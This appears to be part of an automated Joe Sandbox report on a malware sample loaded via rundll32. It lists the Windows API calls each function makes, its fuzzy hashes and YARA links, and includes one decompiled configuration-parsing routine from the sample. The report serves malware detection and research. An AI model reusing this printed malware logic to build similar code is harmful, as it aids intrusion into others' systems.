                                                          Function 0558F841, Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0558F84B
                                                            • Part of subcall function 055925C7: RegOpenKeyExA.KERNEL32(0558F863,00000000,00000000,00020119,80000001,00000000,?,00000000,7519F560,00000000,?,0558F863,80000001), ref: 0559260E
                                                            • Part of subcall function 055925C7: RegOpenKeyExA.ADVAPI32(0558F863,0558F863,00000000,00020019,80000001,?,0558F863,80000001), ref: 05592624
                                                            • Part of subcall function 055925C7: RegCloseKey.ADVAPI32(80000001,?,0558F863,80000001), ref: 0559266D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Open$Closememset
                                                          • String ID:
                                                          • API String ID: 1685373161-0
                                                          • Opcode ID: b3befba2d152763c9200d144fac1eb4552a1054144e5f10190f8403f1599c482
                                                          • Instruction ID: 70ce0ac16cebfe2258fc4ebe02dfdffeaf5aa842bbbf8462ca979e7b5749d1bb
                                                          • Opcode Fuzzy Hash: b3befba2d152763c9200d144fac1eb4552a1054144e5f10190f8403f1599c482
                                                          • Instruction Fuzzy Hash: 72E0EC34240109B7DB04FE54C855FAD7759BF44394F108015BE0C6E652EB71E660CAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 055714A0, Relevance: 28.7, APIs: 19, Instructions: 233stringfilesynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                            • Part of subcall function 055921EC: ExpandEnvironmentStringsW.KERNEL32(0558F2AD,00000000,00000000,00000001,00000000,00000000,00000000,0558F2AD,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 05592203
                                                            • Part of subcall function 055921EC: ExpandEnvironmentStringsW.KERNEL32(0558F2AD,00000000,00000000,00000000,?,?,?,00000000), ref: 0559221D
                                                          • lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                          • lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                          • memset.NTDLL ref: 05571540
                                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                          • lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                          • lstrlenW.KERNEL32(?), ref: 0557159B
                                                          • memset.NTDLL ref: 055715BE
                                                          • wcscpy.NTDLL ref: 055715D0
                                                          • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 055715F6
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0557162B
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05571647
                                                          • FindNextFileW.KERNEL32(?,00000000), ref: 05571660
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 05571672
                                                          • FindClose.KERNEL32(?), ref: 05571687
                                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557169B
                                                          • lstrlenW.KERNEL32(0000002C), ref: 055716BD
                                                          • FindNextFileW.KERNEL32(?,00000000), ref: 05571733
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 05571745
                                                          • FindClose.KERNEL32(?), ref: 05571760
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                                          • String ID:
                                                          • API String ID: 2962561936-0
                                                          • Opcode ID: 97983064937acc7bfedda8c7952d7ab2a0dd2c6f097c939bd1acc18d760fb3e6
                                                          • Instruction ID: 77ac79f95edf7554ef823d2a28b089af062173bfa239c44126831c65936250a1
                                                          • Opcode Fuzzy Hash: 97983064937acc7bfedda8c7952d7ab2a0dd2c6f097c939bd1acc18d760fb3e6
                                                          • Instruction Fuzzy Hash: 1D81AB7060870AAFCB20AF25EC84F2BBBE9FF84300F04482AF49696152DB74D808DF55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05575C88, Relevance: 16.9, APIs: 11, Instructions: 376memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575CBE
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575CF0
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575D22
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575D54
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575D86
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575DB8
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575DEA
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575E1C
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575E4E
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575EF5
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05575F20
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b69f22e0555721f9c806ce1ac1647348662bbbf6df44b80aa4ddc3fe71f1ce22
                                                          • Instruction ID: 303b44116fff6ff6bedcbeac1fad9a35b767469de1680cbf73e1efef4aa15afb
                                                          • Opcode Fuzzy Hash: b69f22e0555721f9c806ce1ac1647348662bbbf6df44b80aa4ddc3fe71f1ce22
                                                          • Instruction Fuzzy Hash: 54C181B072521AABD710EB75FC89D6B3F9CBF486507554C26B806C7240FE38EA45DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558FBB9, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,69B25F44,00000000,?,0557B496,?,00000000,?,?), ref: 0558FBEC
                                                          • GetLastError.KERNEL32(?,0557B496,?,00000000,?,?), ref: 0558FBFA
                                                          • NtSetInformationProcess.NTDLL ref: 0558FC54
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0558FC93
                                                          • GetProcAddress.KERNEL32(?), ref: 0558FCB4
                                                          • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 0558FD0B
                                                          • CloseHandle.KERNEL32(?), ref: 0558FD21
                                                          • CloseHandle.KERNEL32(?), ref: 0558FD47
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                                          • String ID:
                                                          • API String ID: 3529370251-0
                                                          • Opcode ID: 5bc603001aa9b4e9d41db2c95bf9b4f7ccdd3c7f67bf860df7af169a63e53b8e
                                                          • Instruction ID: 1b540f3e24a3725124edc1d4d2baef007805ec3097aca3f701facb193cdd1434
                                                          • Opcode Fuzzy Hash: 5bc603001aa9b4e9d41db2c95bf9b4f7ccdd3c7f67bf860df7af169a63e53b8e
                                                          • Instruction Fuzzy Hash: E7418E70518346DFD710EF24D849A2ABBE9FF8C348F000D2AF655A2150EB75DA49DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05591802, Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wcscpy.NTDLL ref: 05591836
                                                          • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 05591842
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05591853
                                                          • memset.NTDLL ref: 05591870
                                                          • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0559187E
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0559188C
                                                          • GetDriveTypeW.KERNEL32(?), ref: 0559189A
                                                          • lstrlenW.KERNEL32(?), ref: 055918A6
                                                          • wcscpy.NTDLL ref: 055918B8
                                                          • lstrlenW.KERNEL32(?), ref: 055918D2
                                                          • HeapFree.KERNEL32(00000000,?), ref: 055918EB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                                          • String ID:
                                                          • API String ID: 3888849384-0
                                                          • Opcode ID: 1fbad9a78098f83a2f207fabaf3d2354ba8a38210f0438aa5ea38d1a931d187d
                                                          • Instruction ID: 7cf38ac636afbd01a6cd1e584cf74cd9736ef5ac2b8e9ef60205095292522361
                                                          • Opcode Fuzzy Hash: 1fbad9a78098f83a2f207fabaf3d2354ba8a38210f0438aa5ea38d1a931d187d
                                                          • Instruction Fuzzy Hash: B9316D32800119FFCF119BA5EC89CEEBFB9FF49364B114016F005E2011DB39AA49EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5725F, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 225memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E00E5725F(int* __ecx) {
				char _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				signed int _t59;
				void* _t61;
				void* _t62;
				signed int _t64;
				signed int _t67;
				signed int _t71;
				signed int _t75;
				signed int _t79;
				signed int _t83;
				signed int _t87;
				void* _t92;
				intOrPtr _t109;

				_t93 = __ecx;
				_t28 =  *0xe5a2d0; // 0x69b25f44
				_t2 =  &_v8; // 0xe54540
				if(E00E56BB2(_t2,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					_t4 =  &_v8; // 0xe54540
					 *0xe5a324 =  *_t4;
				}
				_t33 =  *0xe5a2d0; // 0x69b25f44
				if(E00E56BB2( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L57:
					return _v12;
				}
				_t39 =  *0xe5a2d0; // 0x69b25f44
				_t7 =  &_v8; // 0xe54540
				if(E00E56BB2( &_v12, _t7, _t39 ^ 0xe60382a5) == 0) {
					L55:
					HeapFree( *0xe5a290, 0, _v16);
					goto L57;
				} else {
					_t92 = _v12;
					if(_t92 == 0) {
						_t45 = 0;
					} else {
						_t87 =  *0xe5a2d0; // 0x69b25f44
						_t45 = E00E52C90(_t93, _t92, _t87 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t10 =  &_v8; // 0xe54540
						_t93 = _t10;
						if(StrToIntExA(_t45, 0, _t10) != 0) {
							_t11 =  &_v8; // 0xe54540
							 *0xe5a298 =  *_t11;
						}
					}
					if(_t92 == 0) {
						_t46 = 0;
					} else {
						_t83 =  *0xe5a2d0; // 0x69b25f44
						_t46 = E00E52C90(_t93, _t92, _t83 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t12 =  &_v8; // 0xe54540
						_t93 = _t12;
						if(StrToIntExA(_t46, 0, _t12) != 0) {
							_t13 =  &_v8; // 0xe54540
							 *0xe5a29c =  *_t13;
						}
					}
					if(_t92 == 0) {
						_t47 = 0;
					} else {
						_t79 =  *0xe5a2d0; // 0x69b25f44
						_t47 = E00E52C90(_t93, _t92, _t79 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t14 =  &_v8; // 0xe54540
						_t93 = _t14;
						if(StrToIntExA(_t47, 0, _t14) != 0) {
							_t15 =  &_v8; // 0xe54540
							 *0xe5a2a0 =  *_t15;
						}
					}
					if(_t92 == 0) {
						_t48 = 0;
					} else {
						_t75 =  *0xe5a2d0; // 0x69b25f44
						_t48 = E00E52C90(_t93, _t92, _t75 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t16 =  &_v8; // 0xe54540
						_t93 = _t16;
						if(StrToIntExA(_t48, 0, _t16) != 0) {
							_t17 =  &_v8; // 0xe54540
							 *0xe5a004 =  *_t17;
						}
					}
					if(_t92 == 0) {
						_t49 = 0;
					} else {
						_t71 =  *0xe5a2d0; // 0x69b25f44
						_t49 = E00E52C90(_t93, _t92, _t71 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t18 =  &_v8; // 0xe54540
						_t93 = _t18;
						if(StrToIntExA(_t49, 0, _t18) != 0) {
							_t19 =  &_v8; // 0xe54540
							 *0xe5a02c =  *_t19;
						}
					}
					if(_t92 == 0) {
						_t50 = 0;
					} else {
						_t67 =  *0xe5a2d0; // 0x69b25f44
						_t50 = E00E52C90(_t93, _t92, _t67 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0xe5a2a4 = 5;
						goto L42;
					} else {
						_t20 =  &_v8; // 0xe54540
						_t93 = _t20;
						if(StrToIntExA(_t50, 0, _t20) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t92 == 0) {
								_t51 = 0;
							} else {
								_t64 =  *0xe5a2d0; // 0x69b25f44
								_t51 = E00E52C90(_t93, _t92, _t64 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t61 = 0x10;
								_t62 = E00E55BBA(_t61);
								if(_t62 != 0) {
									_push(_t62);
									E00E5152E();
								}
							}
							if(_t92 == 0) {
								_t52 = 0;
							} else {
								_t59 =  *0xe5a2d0; // 0x69b25f44
								_t52 = E00E52C90(_t93, _t92, _t59 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E00E55BBA(0, _t52) != 0) {
								_t109 =  *0xe5a37c; // 0x51b9630
								E00E54013(_t109 + 4, _t57);
							}
							_t53 =  *0xe5a2d4; // 0x435d5a8
							_t22 = _t53 + 0xe5b2d2; // 0x51b887a
							_t23 = _t53 + 0xe5b7c4; // 0x6976612e
							 *0xe5a320 = _t22;
							 *0xe5a390 = _t23;
							HeapFree( *0xe5a290, 0, _t92);
							_v12 = 0;
							goto L55;
						}
					}
				}
			}































                                                          0x00e5725f
                                                          0x00e57262
                                                          0x00e57277
                                                          0x00e57282
                                                          0x00e5728d
                                                          0x00e57290
                                                          0x00e57290
                                                          0x00e57295
                                                          0x00e572af
                                                          0x00e574bc
                                                          0x00e574c3
                                                          0x00e574ca
                                                          0x00e574ca
                                                          0x00e572b5
                                                          0x00e572c0
                                                          0x00e572d1
                                                          0x00e574aa
                                                          0x00e574b4
                                                          0x00000000
                                                          0x00e572d7
                                                          0x00e572d7
                                                          0x00e572dc
                                                          0x00e572f2
                                                          0x00e572de
                                                          0x00e572de
                                                          0x00e572eb
                                                          0x00e572eb
                                                          0x00e572fc
                                                          0x00e572fe
                                                          0x00e572fe
                                                          0x00e57308
                                                          0x00e5730a
                                                          0x00e5730d
                                                          0x00e5730d
                                                          0x00e57308
                                                          0x00e57314
                                                          0x00e5732a
                                                          0x00e57316
                                                          0x00e57316
                                                          0x00e57323
                                                          0x00e57323
                                                          0x00e5732e
                                                          0x00e57330
                                                          0x00e57330
                                                          0x00e5733a
                                                          0x00e5733c
                                                          0x00e5733f
                                                          0x00e5733f
                                                          0x00e5733a
                                                          0x00e57346
                                                          0x00e5735c
                                                          0x00e57348
                                                          0x00e57348
                                                          0x00e57355
                                                          0x00e57355
                                                          0x00e57360
                                                          0x00e57362
                                                          0x00e57362
                                                          0x00e5736c
                                                          0x00e5736e
                                                          0x00e57371
                                                          0x00e57371
                                                          0x00e5736c
                                                          0x00e57378
                                                          0x00e5738e
                                                          0x00e5737a
                                                          0x00e5737a
                                                          0x00e57387
                                                          0x00e57387
                                                          0x00e57392
                                                          0x00e57394
                                                          0x00e57394
                                                          0x00e5739e
                                                          0x00e573a0
                                                          0x00e573a3
                                                          0x00e573a3
                                                          0x00e5739e
                                                          0x00e573aa
                                                          0x00e573c0
                                                          0x00e573ac
                                                          0x00e573ac
                                                          0x00e573b9
                                                          0x00e573b9
                                                          0x00e573c4
                                                          0x00e573c6
                                                          0x00e573c6
                                                          0x00e573d0
                                                          0x00e573d2
                                                          0x00e573d5
                                                          0x00e573d5
                                                          0x00e573d0
                                                          0x00e573dc
                                                          0x00e573f2
                                                          0x00e573de
                                                          0x00e573de
                                                          0x00e573eb
                                                          0x00e573eb
                                                          0x00e573f6
                                                          0x00e57409
                                                          0x00e57409
                                                          0x00000000
                                                          0x00e573f8
                                                          0x00e573f8
                                                          0x00e573f8
                                                          0x00e57402
                                                          0x00000000
                                                          0x00e57413
                                                          0x00e57413
                                                          0x00e57415
                                                          0x00e5742b
                                                          0x00e57417
                                                          0x00e57417
                                                          0x00e57424
                                                          0x00e57424
                                                          0x00e5742f
                                                          0x00e57431
                                                          0x00e57434
                                                          0x00e57435
                                                          0x00e5743c
                                                          0x00e5743e
                                                          0x00e5743f
                                                          0x00e5743f
                                                          0x00e5743c
                                                          0x00e57446
                                                          0x00e5745c
                                                          0x00e57448
                                                          0x00e57448
                                                          0x00e57455
                                                          0x00e57455
                                                          0x00e57460
                                                          0x00e5746e
                                                          0x00e57478
                                                          0x00e57478
                                                          0x00e5747d
                                                          0x00e57483
                                                          0x00e57490
                                                          0x00e57496
                                                          0x00e5749c
                                                          0x00e574a1
                                                          0x00e574a7
                                                          0x00000000
                                                          0x00e574a7
                                                          0x00e57402
                                                          0x00e573f6

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E57304
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E57336
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E57368
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E5739A
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E573CC
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,@E,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E573FE
                                                          • HeapFree.KERNEL32(00000000,?,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E574A1
                                                          • HeapFree.KERNEL32(00000000,?,?,@E,69B25F44,?,?,69B25F44,@E,?,69B25F44,E8FA7DD7,00E5A00C,74ECC740), ref: 00E574B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: @E
                                                          • API String ID: 3298025750-1177087360
                                                          • Opcode ID: 0bf92e6a0eb0176d3f134b40967cbba143866c9b8518603ba0e73e66f9667562
                                                          • Instruction ID: 8bc929ac41f82e2b48b2f99323624f9d9c54018285c86992e62458aa24101b42
                                                          • Opcode Fuzzy Hash: 0bf92e6a0eb0176d3f134b40967cbba143866c9b8518603ba0e73e66f9667562
                                                          • Instruction Fuzzy Hash: A771C374A04204AFCB14DBB5EC89C9F77E9AB48306F282D65BD41F7121E631DD5CAB21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05581577, Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0557E52C: ExpandEnvironmentStringsW.KERNEL32(755506E0,00000000,00000000,755506E0,00000020,80000001,055914F6,?,80000001), ref: 0557E53D
                                                            • Part of subcall function 0557E52C: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0557E55A
                                                          • FreeLibrary.KERNEL32(?), ref: 055816AD
                                                            • Part of subcall function 0557899F: lstrlenW.KERNEL32(?,00000000,?,?,?,055815F2,?,?), ref: 055789AC
                                                            • Part of subcall function 0557899F: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,055815F2,?,?), ref: 055789D5
                                                            • Part of subcall function 0557899F: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 055789F5
                                                            • Part of subcall function 0557899F: lstrcpyW.KERNEL32(-00000002,?), ref: 05578A10
                                                            • Part of subcall function 0557899F: SetCurrentDirectoryW.KERNEL32(?,?,?,?,055815F2,?,?), ref: 05578A1C
                                                            • Part of subcall function 0557899F: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,055815F2,?,?), ref: 05578A1F
                                                            • Part of subcall function 0557899F: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,055815F2,?,?), ref: 05578A2B
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578A48
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578A62
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578A78
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578A8E
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578AA4
                                                            • Part of subcall function 0557899F: GetProcAddress.KERNEL32(00000000,?), ref: 05578ABA
                                                          • FindFirstFileW.KERNEL32(?,?,?,?), ref: 05581603
                                                          • lstrlenW.KERNEL32(?), ref: 0558161F
                                                          • lstrlenW.KERNEL32(?), ref: 05581637
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 05581650
                                                          • lstrcpyW.KERNEL32(00000002), ref: 05581665
                                                            • Part of subcall function 0559295D: lstrlenW.KERNEL32(00000000,00000000,75188250,751469A0,?,?,?,05581675,?,00000000,?), ref: 0559296D
                                                            • Part of subcall function 0559295D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05581675,?,00000000,?), ref: 0559298F
                                                            • Part of subcall function 0559295D: lstrcpyW.KERNEL32(00000000,00000000), ref: 055929BB
                                                            • Part of subcall function 0559295D: lstrcatW.KERNEL32(00000000,?), ref: 055929CE
                                                          • FindNextFileW.KERNEL32(?,00000010), ref: 0558168D
                                                          • FindClose.KERNEL32(00000002), ref: 0558169B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                                          • String ID:
                                                          • API String ID: 1209511739-0
                                                          • Opcode ID: 7a522a8dd9f062db11d16da359be22962b7ea891418d43d5575df1a563a8e99f
                                                          • Instruction ID: f6c60ef04b3f66c5473a55d634ef74863e04c5604d7aa81a4054a3efe146b293
                                                          • Opcode Fuzzy Hash: 7a522a8dd9f062db11d16da359be22962b7ea891418d43d5575df1a563a8e99f
                                                          • Instruction Fuzzy Hash: 82418D716183069FDB11EF61EC49A2FBBE8FF84704F08092AF491E2150DB34D909DBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05586E4E, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000), ref: 05586E66
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05586ECF
                                                          • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 05586EF7
                                                          • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 05586F49
                                                          • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 05586F54
                                                          • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05586F67
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                                          • String ID:
                                                          • API String ID: 499515686-0
                                                          • Opcode ID: 70bd860777077b5fa4842941c7b78c81d506407034707782446e52f77acf19b4
                                                          • Instruction ID: 56ec186f8572d2216cb9ee7c8ec0426e83bce1a69603421161ff5193692bff9b
                                                          • Opcode Fuzzy Hash: 70bd860777077b5fa4842941c7b78c81d506407034707782446e52f77acf19b4
                                                          • Instruction Fuzzy Hash: 3541397191420AEFDF11AFA1DC89ABEBFB9FF10344F1044A6E401B6154DB74DA54EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05585529, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,05578B0B), ref: 05585549
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05585568
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0558557D
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05585593
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 055855A9
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 055855BF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHeapLibraryLoad
                                                          • String ID:
                                                          • API String ID: 2486251641-0
                                                          • Opcode ID: 05bdd1f202825bd72d15de76ed9506b1d85cf9bb7e556029e59cf954e229a4f7
                                                          • Instruction ID: 70f5a3c075fa3f0bca770388e2dbe576e943aceb9acd87fa7556c42cadca0f77
                                                          • Opcode Fuzzy Hash: 05bdd1f202825bd72d15de76ed9506b1d85cf9bb7e556029e59cf954e229a4f7
                                                          • Instruction Fuzzy Hash: 5E114FB260030BAFD710EBAAEC85D6637ECFB457447064926F946D7201EF38EC099B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055855D6, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 055855F8
                                                            • Part of subcall function 0558A71C: NtAllocateVirtualMemory.NTDLL(05585620,00000000,00000000,05585620,00003000,00000040), ref: 0558A74D
                                                            • Part of subcall function 0558A71C: RtlNtStatusToDosError.NTDLL(00000000), ref: 0558A754
